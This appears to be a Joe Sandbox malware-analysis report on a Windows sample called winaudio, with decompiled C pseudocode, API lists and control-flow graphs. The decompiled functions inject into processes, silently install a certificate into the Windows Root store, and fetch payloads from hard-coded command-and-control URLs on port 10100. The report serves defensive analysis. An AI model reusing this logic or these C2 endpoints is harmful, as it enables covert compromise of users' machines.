                        0x002dbac9
                        0x002dbacf
                        0x002dbad1
                        0x002dbad4
                        0x002dbada
                        0x002dbadd
                        0x002dbae3
                        0x002dbae6
                        0x002dbaef
                        0x002dbaf5
                        0x002dbafb
                        0x002dbafe
                        0x00000000
                        0x00000000
                        0x002dbb00
                        0x002dbb06
                        0x00000000
                        0x00000000
                        0x002dbb10
                        0x002dbb15
                        0x002dbb17
                        0x002dbb17
                        0x002dbb20
                        0x002dbab5
                        0x002dba4a
                        0x00000000
                        0x002db90e
                        0x002db6b9
                        0x002db6bf
                        0x002db6c1
                        0x002db6c7
                        0x002db6c9
                        0x002db6cb
                        0x002dbc31
                        0x002dbc37
                        0x002dbc42
                        0x002dbc47
                        0x00000000
                        0x002dbc47
                        0x002db6d1
                        0x002db6d6
                        0x002dbc2a
                        0x002dbc2b
                        0x00000000
                        0x002dbc2b
                        0x00000000
                        0x002db6d6
                        0x002db63a
                        0x002dbb27
                        0x002dbb2c
                        0x002dbb33
                        0x002dbb35
                        0x002dbb38
                        0x002dbb40
                        0x002dbb4a
                        0x002dbb4a
                        0x002dbb60
                        0x002dbb63
                        0x002dbb6a
                        0x002dbb6d
                        0x002dbb72
                        0x002dbb7b
                        0x002dbb88
                        0x002dbb8d
                        0x002dbb92
                        0x002dbb99
                        0x002dbb9c
                        0x002dbba1
                        0x002dbbaa
                        0x002dbbb7
                        0x002dbbc2
                        0x002dbbcb
                        0x002dbbdc
                        0x002dbbe2
                        0x002dbbe7
                        0x002dbbec
                        0x002dbbf3
                        0x002dbc03
                        0x002dbc12
                        0x002dbc12
                        0x002dbc26
                        0x002dbc28
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002db566
                        0x002db566
                        0x002db56a
                        0x002db57a
                        0x002db582
                        0x002db589
                        0x002db594
                        0x002db594
                        0x002db599
                        0x002db5a8
                        0x002db5ab
                        0x002db5b8
                        0x002db5bd
                        0x002db5c5
                        0x002db5c8
                        0x002db5c8
                        0x002db5d4
                        0x002dbc49
                        0x002dbc4c
                        0x002dbc55
                        0x002dbc64
                        0x002dbc64

                        APIs
                          • Part of subcall function 002D34E0: WSAStartup.WS2_32(00000202,?), ref: 002D3536
                          • Part of subcall function 002D5A90: LoadLibraryA.KERNEL32(Kernel32.dll,00000000,?,002DB562,?,?,?,?,?,?,?,?,847B54EE), ref: 002D5AA6
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(00000000,OpenProcess), ref: 002D5AC5
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(VirtualAllocEx), ref: 002D5ADF
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(WriteProcessMemory), ref: 002D5AF9
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(CreateRemoteThread), ref: 002D5B13
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(WaitForSingleObject), ref: 002D5B2D
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(VirtualFreeEx), ref: 002D5B47
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(LoadLibraryA), ref: 002D5B5D
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(IsWow64Process), ref: 002D5B73
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(CreateToolhelp32Snapshot), ref: 002D5B89
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(Process32First), ref: 002D5B9F
                          • Part of subcall function 002D5A90: GetProcAddress.KERNEL32(Process32Next), ref: 002D5BB5
                          • Part of subcall function 002D5A90: GetLastError.KERNEL32(?,002DB562,?,?,?,?,?,?,?,?,847B54EE), ref: 002D5BC5
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,847B54EE), ref: 002DB5C8
                          • Part of subcall function 002D2360: CloseHandle.KERNEL32(002D2350,?,002DB35A,?,?,?,847B54EE), ref: 002D238F
                          • Part of subcall function 002D22F0: Sleep.KERNEL32(0000000A,?,?,002D2188,?,?,0039C3A6,000000FF), ref: 002D2302
                          • Part of subcall function 002D22F0: CloseHandle.KERNEL32(00000000,?,002D2188,?,?,0039C3A6,000000FF), ref: 002D2317
                        • Sleep.KERNEL32(000493E0), ref: 002DB622
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,847B54EE), ref: 002DB632
                        • SetCurrentDirectoryA.KERNEL32(?), ref: 002DB69D
                        • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 002DB6B9
                        • GetLastError.KERNEL32 ref: 002DB6C7
                        • RegOpenKeyExA.KERNEL32(80000001,Console,00000000,00020019,?), ref: 002DB6FE
                        • RegQueryValueExA.KERNEL32(00000000,WindowTag,00000000,?,?,00000040), ref: 002DB746
                        • RegCloseKey.KERNEL32(00000000), ref: 002DB76B
                        • DeleteFileA.KERNEL32(?), ref: 002DB825
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,?,00000004,?), ref: 002DBA1F
                        • ResumeThread.KERNEL32(?), ref: 002DBA36
                        • CreateThread.KERNEL32(00000000,00000000,Function_00022270,?,00000004,?), ref: 002DBA8A
                        • ResumeThread.KERNEL32(?), ref: 002DBAA1
                        • Sleep.KERNEL32(000003E8), ref: 002DBB15
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,847B54EE), ref: 002DBB25
                        • WaitForSingleObject.KERNEL32(?,00FFFFFF,?,?,?,?,?,?,?,?,847B54EE), ref: 002DBBDC
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,847B54EE), ref: 002DBC03
                        • WinExec.KERNEL32(?,00000000), ref: 002DBC12
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,847B54EE), ref: 002DBC2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$Close$HandleThread$CreateErrorFileLastSleep$ModuleNameResume$CurrentDeleteDirectoryExecLibraryLoadMutexObjectOpenQuerySingleStartupValueWait
                        • String ID: %s%s$@$@!-$C:\Windows\Temp\%s$Console$WindowTag$http://41ku.cn:10100/plusxyzs$http://41ku.cn:10100/plusxyzs$http://8awang.com:10100/plusxyzs$http://gmt.yunliao8.com:10100/plusxyzs$server.crt$server.der$server.key$si-2n*8o_5brl-kq$vmware24A.dat
                        • API String ID: 1887029854-1446817206
                        • Opcode ID: 875e5ffb866a0a9f4a155e006f9e7d40a7f3b1fba5f046b5b29bfd735ff2573a
                        • Instruction ID: ff7e07e9176f5308a16caed85d6f896d35da0440dc9bc7506b3551e9bf4a285b
                        • Opcode Fuzzy Hash: 875e5ffb866a0a9f4a155e006f9e7d40a7f3b1fba5f046b5b29bfd735ff2573a
                        • Instruction Fuzzy Hash: 7112E5B0D54259DEEB27DF64CC96BAA77ACEB04304F4001A6E508EA3D1DBB89D84CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002CF8B0 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 138libraryloaderencryptionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 312 2cf8b0-2cf8cc LoadLibraryA 313 2cf8ce-2cf8d4 312->313 314 2cf8d5-2cf948 GetProcAddress * 5 312->314 315 2cf94e-2cf950 314->315 316 2cfa43-2cfa53 FreeLibrary 314->316 315->316 317 2cf956-2cf95a 315->317 317->316 318 2cf960-2cf964 317->318 318->316 319 2cf96a-2cf96c 318->319 319->316 320 2cf972-2cf9aa CertCreateCertificateContext 319->320 321 2cf9ac-2cf9c2 GetLastError FreeLibrary 320->321 322 2cf9c3-2cf9da CertOpenStore 320->322 323 2cf9dc-2cf9e2 GetLastError 322->323 324 2cf9e4-2cf9f9 CertAddCertificateContextToStore 322->324 325 2cfa3f 323->325 326 2cfa0e-2cfa31 324->326 327 2cf9fb-2cfa08 GetLastError 324->327 325->316 329 2cfa36-2cfa3c 326->329 327->326 328 2cfa0a-2cfa0c GetLastError 327->328 328->329 329->325
                        C-Code - Quality: 53%
                        			E002CF8B0(intOrPtr __ecx, intOrPtr __edx) {
				char _v5;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				_Unknown_base(*)()* _v36;
				struct HINSTANCE__* _t23;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t29;
				signed int _t32;
				signed int _t34;
				intOrPtr _t37;
				signed int _t40;
				signed int _t42;
				_Unknown_base(*)()* _t55;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t66;
				struct HINSTANCE__* _t70;
				void* _t74;

				_v24 = __edx;
				_v28 = __ecx;
				_t23 = LoadLibraryA("crypt32.dll"); // executed
				_t70 = _t23;
				if(_t70 != 0) {
					_v20 = GetProcAddress(_t70, "CertCreateCertificateContext");
					_t55 = GetProcAddress(_t70, "CertOpenStore");
					_v32 = _t55;
					_t26 = GetProcAddress(_t70, "CertAddCertificateContextToStore");
					_t61 =  *0x3eb4a0; // 0x8
					_v12 = _t26;
					_t63 =  >  ? 0 : _t61 + 2;
					 *0x3eb4a0 = _t63;
					 *0x3f0830 = _t63 & 0x00000019 | 0x000000e0;
					_v16 = GetProcAddress(_t70, "CertCloseStore");
					_t29 = GetProcAddress(_t70, "CertFreeCertificateContext");
					_t66 = _v20;
					_v36 = _t29;
					_v5 = 0;
					if(_t66 == 0 || _t55 == 0 || _v12 == 0 || _v16 == 0 || _t29 == 0) {
						L17:
						FreeLibrary(_t70); // executed
						return _v5;
					} else {
						_t32 =  *0x3eb4a8; // 0x8
						_t34 =  >  ? 0 : _t32 + 2;
						 *0x3eb4a8 = _t34;
						 *0x3f0830 = _t34 & 0x00000019 | 0x000000e0; // executed
						_t37 =  *_t66(0x10001, _v28, _v24); // executed
						_t57 = _t37;
						_v28 = _t57;
						if(_t57 != 0) {
							_t74 = _v32(0xa, 0, 0, 0x24000, L"Root");
							if(_t74 != 0) {
								_push(0);
								_push(1);
								_push(_t57);
								_push(_t74);
								 *0x3f0830 = 0x7ff7; // executed
								if(_v12() != 0 || GetLastError() == 0x80092005) {
									_t40 =  *0x3eb4a4; // 0x8
									_v5 = 1;
									_t42 =  >  ? 0 : _t40 + 2;
									 *0x3eb4a4 = _t42;
									 *0x3f0830 = _t42 & 0x00000019 | 0x000000e0;
								} else {
									GetLastError();
								}
								_v16(_t74, 0);
								_t57 = _v28;
							} else {
								GetLastError();
							}
							_v36(_t57);
							goto L17;
						} else {
							GetLastError();
							FreeLibrary(_t70);
							return _v5;
						}
					}
				} else {
					return 0;
				}
			}


























                        0x002cf8bc
                        0x002cf8bf
                        0x002cf8c2
                        0x002cf8c8
                        0x002cf8cc
                        0x002cf8eb
                        0x002cf8f5
                        0x002cf8f8
                        0x002cf8fb
                        0x002cf8fd
                        0x002cf906
                        0x002cf916
                        0x002cf919
                        0x002cf929
                        0x002cf937
                        0x002cf93a
                        0x002cf93c
                        0x002cf93f
                        0x002cf942
                        0x002cf948
                        0x002cfa43
                        0x002cfa44
                        0x002cfa53
                        0x002cf972
                        0x002cf972
                        0x002cf98c
                        0x002cf98f
                        0x002cf99c
                        0x002cf9a1
                        0x002cf9a3
                        0x002cf9a5
                        0x002cf9aa
                        0x002cf9d6
                        0x002cf9da
                        0x002cf9e4
                        0x002cf9e6
                        0x002cf9e8
                        0x002cf9e9
                        0x002cf9ea
                        0x002cf9f9
                        0x002cfa0e
                        0x002cfa18
                        0x002cfa21
                        0x002cfa24
                        0x002cfa31
                        0x002cfa0a
                        0x002cfa0a
                        0x002cfa0a
                        0x002cfa39
                        0x002cfa3c
                        0x002cf9dc
                        0x002cf9dc
                        0x002cf9dc
                        0x002cfa40
                        0x00000000
                        0x002cf9ac
                        0x002cf9ac
                        0x002cf9b3
                        0x002cf9c2
                        0x002cf9c2
                        0x002cf9aa
                        0x002cf8ce
                        0x002cf8d4
                        0x002cf8d4

                        APIs
                        • LoadLibraryA.KERNEL32(crypt32.dll), ref: 002CF8C2
                        • GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 002CF8E3
                        • GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 002CF8EE
                        • GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 002CF8FB
                        • GetProcAddress.KERNEL32(00000000,CertCloseStore), ref: 002CF92F
                        • GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 002CF93A
                        • CertCreateCertificateContext.CRYPT32(00010001,?,?), ref: 002CF9A1
                        • GetLastError.KERNEL32 ref: 002CF9AC
                        • FreeLibrary.KERNEL32(00000000), ref: 002CF9B3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressProc$Library$CertCertificateContextCreateErrorFreeLastLoad
                        • String ID: CertAddCertificateContextToStore$CertCloseStore$CertCreateCertificateContext$CertFreeCertificateContext$CertOpenStore$Root$crypt32.dll
                        • API String ID: 1022270662-3542034961
                        • Opcode ID: 0453c9a95cc7e302f5f27e611e04e505128d56d7b1a752ab42c50a2755c9bfad
                        • Instruction ID: 3eedd6c2faab6dcfd050b009237fc7d0329c40bcd87b6dec4106d2ca329af7cd
                        • Opcode Fuzzy Hash: 0453c9a95cc7e302f5f27e611e04e505128d56d7b1a752ab42c50a2755c9bfad
                        • Instruction Fuzzy Hash: 7241D731E10316ABDB169FA9DC86BAFFBB8EF48304F00056AE505E62D1D7B48440CF54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D3610 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 400networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 331 2d3610-2d3682 socket 332 2d368e-2d370f htons inet_addr setsockopt bind 331->332 333 2d3684-2d3689 call 380e9e 331->333 334 2d3b39-2d3b54 call 2e056d 332->334 335 2d3715-2d374b listen 332->335 333->334 338 2d3b36-2d3b37 closesocket 335->338 339 2d3751-2d3757 335->339 338->334 341 2d3760-2d37d5 call 37e1a0 ioctlsocket accept 339->341 345 2d37de-2d380a select 341->345 346 2d37d7-2d37dc 341->346 348 2d380c-2d380f 345->348 349 2d3811-2d384f getsockopt 345->349 347 2d3856-2d3872 ioctlsocket 346->347 350 2d3878-2d389c recv 347->350 351 2d3b16 347->351 348->347 349->347 353 2d38a0-2d38a5 350->353 352 2d3b1c-2d3b30 351->352 352->338 352->341 353->353 354 2d38a7-2d38af 353->354 355 2d3a9c-2d3aab closesocket 354->355 356 2d38b5-2d38b7 354->356 355->352 356->355 357 2d38bd-2d38c5 356->357 358 2d3aad-2d3aca 357->358 359 2d38cb-2d38e8 357->359 362 2d3acc-2d3ace 358->362 363 2d3ad0-2d3ad9 358->363 360 2d38ee-2d38f4 359->360 361 2d38ea-2d38ec 359->361 367 2d38f7-2d38fc 360->367 366 2d3900-2d3936 call 2d0860 361->366 364 2d3ae9-2d3b14 call 2d0860 call 2df3f0 closesocket 362->364 365 2d3ae0-2d3ae5 363->365 364->352 365->365 368 2d3ae7 365->368 375 2d3988 366->375 376 2d3938-2d3949 366->376 367->367 370 2d38fe 367->370 368->364 370->366 377 2d398b-2d398e 375->377 379 2d3950-2d3958 376->379 380 2d3a07-2d3a53 call 2d0960 call 2d0420 377->380 381 2d3990-2d39bd 377->381 382 2d395a-2d3964 379->382 383 2d3966-2d3973 call 2d05c0 379->383 399 2d3a55-2d3a61 380->399 400 2d3a96 380->400 384 2d39bf-2d39c1 381->384 385 2d39c3-2d39c5 381->385 382->383 386 2d3978-2d3986 382->386 383->375 396 2d3975-2d3976 383->396 390 2d39d1-2d3a02 call 2d0860 call 2d0960 call 2d0420 384->390 391 2d39c8-2d39cd 385->391 386->377 390->380 391->391 394 2d39cf 391->394 394->390 396->379 402 2d3a8d-2d3a93 call 2e05b1 399->402 403 2d3a63-2d3a66 399->403 400->355 402->400 405 2d3a6c-2d3a71 403->405 406 2d3b55-2d3b96 call 37f981 403->406 405->406 409 2d3a77-2d3a7c 405->409 414 2d3ba8-2d3bd1 406->414 415 2d3b98-2d3ba3 call 2d22f0 406->415 409->406 413 2d3a82-2d3a85 409->413 413->406 416 2d3a8b 413->416 417 2d3bda-2d3bde 414->417 418 2d3bd3-2d3bd4 CloseHandle 414->418 415->414 416->402 420 2d3beb-2d3bfc 417->420 421 2d3be0-2d3be8 call 2e083b 417->421 418->417 421->420
                        APIs
                        • socket.WS2_32(00000002,00000001,00000000), ref: 002D3671
                        • htons.WS2_32(00006D83), ref: 002D36A1
                        • inet_addr.WS2_32(127.0.0.1), ref: 002D36B3
                        • setsockopt.WS2_32(00000000,0000FFFF,00001006,000000C8,00000004), ref: 002D36F7
                        • bind.WS2_32(00000000,?,00000010), ref: 002D3707
                        • listen.WS2_32(00000000,0000000A), ref: 002D3718
                        • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 002D37AB
                        • accept.WS2_32(00000000,?,00000000), ref: 002D37C6
                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 002D386D
                        • recv.WS2_32(?,?,000000FF,00000000), ref: 002D388D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ioctlsocket$acceptbindhtonsinet_addrlistenrecvsetsockoptsocket
                        • String ID: #$127.0.0.1$@!-
                        • API String ID: 3963004253-3042463141
                        • Opcode ID: 86e9db967106e821616918d0cf52bac379a8c0169127bf55dc07a538540722c7
                        • Instruction ID: 411c5516cd0401e532582154296ed6111590a9cd50b6d44589a96ae8693a57d5
                        • Opcode Fuzzy Hash: 86e9db967106e821616918d0cf52bac379a8c0169127bf55dc07a538540722c7
                        • Instruction Fuzzy Hash: 22F13270A142599FDB25DF24CC88BE9B7B8EB09314F0042EAE459A73D1DBB45E84CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002DAC90 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 462threadregistrysleepCOMMONCrypto
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 425 2dac90-2dad5a call 37e1a0 * 2 call 2d8480 432 2dad60-2dad62 425->432 433 2dad68-2dad70 432->433 434 2daf35-2daf3e 432->434 435 2dad8f-2dadb9 RegOpenKeyExA 433->435 436 2dad72-2dad85 call 380508 433->436 437 2daf49-2daf51 434->437 438 2daf40-2daf46 call 380508 434->438 442 2dadbb-2dae01 call 37e1a0 RegQueryValueExA 435->442 443 2dae24-2dae54 call 2da760 call 2daad0 435->443 436->435 439 2daf5c-2daf5e 437->439 440 2daf53-2daf59 call 380508 437->440 438->437 447 2daf60-2daf69 439->447 440->439 456 2dae18-2dae1e RegCloseKey 442->456 457 2dae03-2dae13 442->457 462 2dae57-2dae5c 443->462 453 2daf6f-2dafbd 447->453 454 2db2d9-2db346 call 2d22f0 call 3811df call 2d7d80 call 2e05b1 447->454 463 2dafbf-2dafc8 call 380508 453->463 464 2dafd3-2dafd5 453->464 492 2db348-2db360 call 2d2360 call 2d22f0 454->492 493 2db365-2db391 454->493 456->443 457->456 462->462 466 2dae5e-2dae63 462->466 463->464 468 2dafdf-2dafe1 464->468 469 2dafd7-2dafdb 464->469 466->434 472 2dae69-2dae8e call 379320 466->472 468->447 469->468 479 2db2a4-2db2ad 472->479 480 2dae94-2daea6 472->480 479->434 482 2db2b3-2db2b9 479->482 483 2daf18-2daf28 480->483 484 2daea8-2daeb0 480->484 482->432 486 2db2bf-2db2d2 Sleep 482->486 487 2daf2e 483->487 488 2dafe6-2dafee 483->488 484->483 489 2daeb2-2daebf 484->489 486->482 494 2db2d4 486->494 487->434 490 2daff9-2db006 call 380789 488->490 491 2daff0-2daff6 call 380508 488->491 495 2daec1-2daec5 489->495 496 2daed2-2daed5 489->496 490->479 510 2db00c-2db01e call 37e340 490->510 491->490 492->493 502 2db39a-2db3b5 call 2e056d 493->502 503 2db393-2db394 CloseHandle 493->503 494->432 497 2daedb-2daedf 495->497 498 2daec7-2daed0 495->498 496->479 496->497 497->483 505 2daee1-2daee4 497->505 498->495 498->496 503->502 505->479 509 2daeea-2daef0 505->509 509->483 513 2daef2-2daef5 509->513 518 2db020-2db026 510->518 513->479 515 2daefb-2daf01 513->515 515->483 517 2daf03-2daf06 515->517 517->479 519 2daf0c-2daf12 517->519 520 2db028-2db068 518->520 521 2db080-2db0d1 call 2d22f0 call 2d9070 518->521 519->479 519->483 525 2db06a-2db06e 520->525 526 2db072-2db07e 520->526 521->479 530 2db0d7-2db0f4 call 2d9ce0 521->530 525->526 526->518 530->479 533 2db0fa-2db11b 530->533 534 2db120-2db126 533->534 535 2db12c-2db156 call 2e057e call 2dd730 534->535 536 2db22e-2db23d call 2da610 534->536 535->479 545 2db15c-2db179 call 2dd870 535->545 536->434 541 2db243-2db24a 536->541 541->434 544 2db250-2db258 541->544 546 2db27f-2db29e ResumeThread 544->546 547 2db25a-2db279 CreateThread 544->547 545->479 550 2db17f-2db188 545->550 546->434 546->479 547->546 551 2db19e-2db1da call 2cf8b0 550->551 552 2db18a-2db18b call 380508 550->552 551->479 557 2db1e0-2db1e6 551->557 555 2db190-2db193 552->555 555->551 557->479 558 2db1ec-2db1ef 557->558 559 2db208-2db226 ResumeThread 558->559 560 2db1f1-2db205 CreateThread 558->560 559->479 561 2db228-2db229 559->561 560->559 561->534
                        C-Code - Quality: 86%
                        			E002DAC90(void* __ebx, signed int __edi, void* __eflags) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v88;
				char _v1112;
				char _v2136;
				struct _SECURITY_ATTRIBUTES* _v2140;
				struct _SECURITY_ATTRIBUTES* _v2144;
				signed int _v2148;
				struct _SECURITY_ATTRIBUTES* _v2156;
				char _v2160;
				char _v2163;
				signed int _v2164;
				long _v2168;
				struct _SECURITY_ATTRIBUTES* _v2172;
				void _v2176;
				void* _v2180;
				signed int _v2184;
				int _v2188;
				signed int _v2192;
				int _v2196;
				intOrPtr* _v2200;
				intOrPtr _v2204;
				char _v2208;
				void* __esi;
				void* __ebp;
				signed int _t139;
				signed int _t140;
				signed int _t147;
				signed int _t149;
				signed int _t158;
				void* _t159;
				signed int _t160;
				void* _t163;
				signed int _t170;
				signed int _t172;
				long _t183;
				signed int _t185;
				signed int _t187;
				void* _t191;
				intOrPtr _t193;
				signed int _t194;
				signed int _t199;
				void* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				void* _t207;
				signed int _t208;
				signed int _t211;
				void* _t212;
				signed int _t213;
				signed int _t214;
				intOrPtr* _t217;
				intOrPtr _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				void* _t227;
				signed int _t231;
				void* _t232;
				signed int _t233;
				signed int _t239;
				long _t250;
				intOrPtr _t252;
				signed int _t256;
				signed char _t257;
				intOrPtr* _t261;
				intOrPtr _t274;
				intOrPtr _t286;
				signed int _t287;
				void* _t288;
				signed int _t289;
				intOrPtr* _t296;
				intOrPtr _t297;
				void* _t300;
				void* _t301;
				signed int _t302;
				signed int _t304;
				void* _t305;
				intOrPtr _t306;
				void* _t307;
				void* _t309;

				_t309 = __eflags;
				_t298 = __edi;
				_push(0xffffffff);
				_push(0x39caae);
				_push( *[fs:0x0]);
				_t306 = _t305 - 0x890;
				_t139 =  *0x3e1008; // 0x847b54ee
				_t140 = _t139 ^ _t304;
				_v24 = _t140;
				_push(__ebx);
				_push(_t300);
				_push(__edi);
				_push(_t140);
				 *[fs:0x0] =  &_v16;
				_v20 = _t306;
				_t256 = 0;
				E0037E1A0(__edi,  &_v1112, 0, 0x400);
				_t295 = 0;
				_v2140 = 0;
				_v2184 = 0;
				_v2148 = 0;
				_v2192 = 0;
				E0037E1A0(_t298,  &_v2136, 0, 0x400);
				_v2176 = 0x3dce9c;
				_t307 = _t306 + 0x18;
				_v2164 = 0;
				_v2163 = 0;
				_v2172 = 0;
				_v8 = 0;
				_v2176 = 0x3dd54c;
				_v2160 = 0;
				_v2156 = 0;
				_v2160 = E002D8480(_t309);
				_v8 = 1;
				_v8 = 2;
				_t147 =  *0x3f0835; // 0x0
				_v2144 = 0;
				asm("o16 nop [eax+eax]");
				L1:
				while(_t147 == 0) {
					_t181 = _v2140;
					if(_v2140 != 0) {
						L00380508(_t181);
						_t307 = _t307 + 4;
						_v2140 = 0;
						_v2148 = 0;
					}
					_v2180 = 0;
					_t183 = RegOpenKeyExA(0x80000001, "Console", 0, 0x20019,  &_v2180); // executed
					if(_t183 == 0) {
						_v2188 = _t183;
						E0037E1A0(_t298,  &_v88, _t183, 0x40);
						_t307 = _t307 + 0xc;
						_v2196 = 0x40;
						_t250 = RegQueryValueExA(_v2180, "WindowTag", 0,  &_v2188,  &_v88,  &_v2196); // executed
						if(_t250 == 0) {
							_t252 =  *0x3eba80; // 0xb53
							_t253 =  ==  ? _v88 : _t252;
							 *0x3eba80 =  ==  ? _v88 : _t252;
						}
						RegCloseKey(_v2180);
					}
					E002DA760(_t256, _t298, _t300);
					_t185 =  *0x3ebbbc; // 0x0
					_t187 =  >  ? 0 : _t185 + 2;
					 *0x3ebbbc = _t187;
					 *0x3f0830 = _t187 & 0x00000019 | 0x000000e0;
					_t296 = E002DAAD0();
					_t37 = _t296 + 1; // 0x1
					_t300 = _t37;
					do {
						_t274 =  *_t296;
						_t296 = _t296 + 1;
					} while (_t274 != 0);
					_t295 = _t296 - _t300;
					if(_t296 - _t300 >= 1) {
						_t276 =  &_v2140;
						_t191 = E00379320(_t256, _t295, _t298, "http://41ku.cn:10100/plusxyzs", _t190, 1,  &_v2140,  &_v2148, "si-2n*8o_5brl-kq"); // executed
						_t307 = _t307 + 0x18;
						if(_t191 == 0) {
							L65:
							_t147 =  *0x3f0835; // 0x0
							_t300 = 0;
							__eflags = _t147;
							if(_t147 != 0) {
								break;
							} else {
								while(1) {
									__eflags = _t300 - 0x384;
									if(_t300 >= 0x384) {
										goto L1;
									}
									Sleep(0x3e8);
									_t147 =  *0x3f0835; // 0x0
									_t300 = _t300 + 1;
									__eflags = _t147;
									if(_t147 == 0) {
										continue;
									} else {
										goto L1;
									}
									goto L74;
								}
								continue;
							}
							goto L69;
						} else {
							_t298 = _v2148;
							 *0x3f0830 = 0x7ff7;
							if(_t256 == 0) {
								L25:
								_t193 = _v2192 + 1;
								_v2192 = _t193;
								if(_t193 < 2) {
									_v2184 = _t298;
									__eflags = _t256;
									if(_t256 != 0) {
										L00380508(_t256);
										_t307 = _t307 + 4;
									}
									_push(_t298); // executed
									_t194 = E00380789(_t276); // executed
									_t256 = _t194;
									_t307 = _t307 + 4;
									__eflags = _t256;
									if(_t256 == 0) {
										goto L65;
									} else {
										E0037E340(_t256, _v2140, _t298);
										_t307 = _t307 + 0xc;
										_t300 = 0;
										__eflags = 0;
										while(1) {
											__eflags = _t300 - _v2144;
											if(_t300 >= _v2144) {
												break;
											}
											_t298 =  *(_t304 + _t300 * 4 - 0x854);
											 *0x3f0830 = 0x7ff7;
											 *((intOrPtr*)( *((intOrPtr*)(_t298 + 4)) + 4))();
											_t231 =  *0x3eb4e0; // 0x6556
											_t232 = _t231 + 2;
											__eflags = _t232 - 0x1490;
